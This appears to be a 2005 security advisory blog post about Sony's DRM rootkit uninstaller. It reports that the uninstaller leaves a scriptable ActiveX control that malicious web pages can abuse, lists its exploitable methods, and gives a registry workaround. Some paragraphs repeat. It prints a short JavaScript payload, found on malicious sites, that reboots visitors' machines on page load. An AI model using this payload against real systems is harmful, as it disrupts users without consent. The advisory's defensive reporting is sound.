Sony”s web-based removal tool can cause another security breach. This was proven by a Finnish researcher named Muzzy.
Muzzy has discovered several Scripting methods from the uninstaller of Sony”s rootkit which is called CodeSupport. CodeSupport is an Active X control that download and install a file from an internet site, regardless if it is from Sony”s website or not. Here are the scriptable methods:
I wonder what the ExecuteCode method does??? Hmmmmmm…. Anyways, Muzzy has created a demo of the “RebootMachine” method. If you are using Internet Explorer and the DRM uninstaller is installed on your system, the script in the demo page WILL reboot your system. Here is the URL to the demo
The link is deliberate made non-clickable. We don’t claim responsibility to any inadvertently rebooted system.
In relation to this, another researcher from Freedom-to-Tinker used some of the scripting methods given above that will detect if the CodeSupport is present on your machine. Click Here. Again, the script from the given link will only execute if you are using MS Internet Explorer.
In summary, if a malicious coder creates a website that uses the Scripting methods that are mentioned above, they can arbitrarily execute any file from the machine that has previously run the Active X control(a.k.a CodeSupport) from Sony”s website.
Technical Analysis from Muzzy: http://hack.fi/~muzzy/sony-drm/
Freedom-to-Tinker’s blog: http://www.freedom-to-tinker.com/?p=927
Muzzy has discovered several Scripting methods from the uninstaller of Sony”s rootkit which is called CodeSupport. CodeSupport is an Active X control that download and install a file from an internet site, regardless if it is from Sony”s website or not. Here are the scriptable methods:
- GenerateRequestPacket
- ExecuteCode (can crash browser, apparently removed in latest ocx)
- Uninstall
- RebootMachine (exploitable, see demo)
- GetProgress
- OnLoaded
- InitializeDiscScan
- GetNumberOfDiscs
- IsDRMServerValid
- GetAlbumArtist
- GetAlbumName
- GetMaxBurnCount
- GetCurrentBurnCount
- GenerateIncrementPacket
- IsContentOwnerValid
- DoIncrement
- GetInstalledSoftwareVersion
- IsXCPDiscPresent
- InstallUpdate (exploitable)
- GetInstallProgress
- GetCompletionStatus
- IsXCPDiscPresentAsLong
- IsAdministrator
I wonder what the ExecuteCode method does??? Hmmmmmm…. Anyways, Muzzy has created a demo of the “RebootMachine” method. If you are using Internet Explorer and the DRM uninstaller is installed on your system, the script in the demo page WILL reboot your system. Here is the URL to the demo
http://hack.fi/~muzzy/sony-drm/reboot.html
The link is deliberate made non-clickable. We don’t claim responsibility to any inadvertently rebooted system.
In relation to this, another researcher from Freedom-to-Tinker used some of the scripting methods given above that will detect if the CodeSupport is present on your machine. Click Here. Again, the script from the given link will only execute if you are using MS Internet Explorer.
In summary, if a malicious coder creates a website that uses the Scripting methods that are mentioned above, they can arbitrarily execute any file from the machine that has previously run the Active X control(a.k.a CodeSupport) from Sony”s website.
Technical Analysis from Muzzy: http://hack.fi/~muzzy/sony-drm/
Freedom-to-Tinker’s blog: http://www.freedom-to-tinker.com/?p=927
Update (JoneZ, 17 November 2005 15:17:23)
The following steps can be done to prevent attacks that may be caused by the ActiveX object:
1. Open regedit.
2. On the left pane click:
Many thanks to Juan Cesar Cuevas for the work around.
1. Open regedit.
2. On the left pane click:
- HKLM > Software > Microsoft > Internet Explorer > ActiveX Compatibility > {4EA7C4C5-C5C0-4F5C-A008-8293505F71CC}
Many thanks to Juan Cesar Cuevas for the work around.
Update (Ji, 17 November 2005 16:00:16)
It has been discovered that the uninstaller drops a COM object to uninstall the rootkit. Unfortunately, this COM object is not removed after the installation of the uninstaller. This could leave the host suscepible to attacks. Several active websites have been found to exploit this vulnerability. Once an “infected” machine accesses the malicious website, several malicious activities could be done. In one of these malicious sites, the following malicious code has been found:
{!- Sony DRM Christmas Gift -}
{script language=”javascript”}
function reboot
{
var ObjCS = new Object();
ObjCS = document[‘CODESUPPORT’];
ObjCS.RebootMachine();
}
window.onload=reboot;
{/script}
This code performs a shutdown on the infected machine. This has been verified to be present in one of the malicious sites, and is only an example of the nasty things that could be done with the use of the “uninstaller”. In order to be safe, use the above-mentioned workaround solution.
{!- Sony DRM Christmas Gift -}
{script language=”javascript”}
function reboot
{
var ObjCS = new Object();
ObjCS = document[‘CODESUPPORT’];
ObjCS.RebootMachine();
}
window.onload=reboot;
{/script}
This code performs a shutdown on the infected machine. This has been verified to be present in one of the malicious sites, and is only an example of the nasty things that could be done with the use of the “uninstaller”. In order to be safe, use the above-mentioned workaround solution.
Update (Ivan, 17 November 2005 16:15:51)
Question: What if I do not have the Sony Rootkit Uninstaller in my system, can I still be affected by this exploit?
Answer: Yes, a malware author could EASILY write a very tiny JavaScript and place it in an HTML page that would attempt to launch the ActiveX Updater, readily found and uploaded at the XCP website.
Question: Should we then detect the ActiveX Updater or the Uninstaller itself?
Answer: This still remains to be disputed, since there may be other clients of XCP aside from Sony and having a detection for the said uninstaller file may cause some legal infringements.
Do hold on for more updates.
Answer: Yes, a malware author could EASILY write a very tiny JavaScript and place it in an HTML page that would attempt to launch the ActiveX Updater, readily found and uploaded at the XCP website.
Question: Should we then detect the ActiveX Updater or the Uninstaller itself?
Answer: This still remains to be disputed, since there may be other clients of XCP aside from Sony and having a detection for the said uninstaller file may cause some legal infringements.
Do hold on for more updates.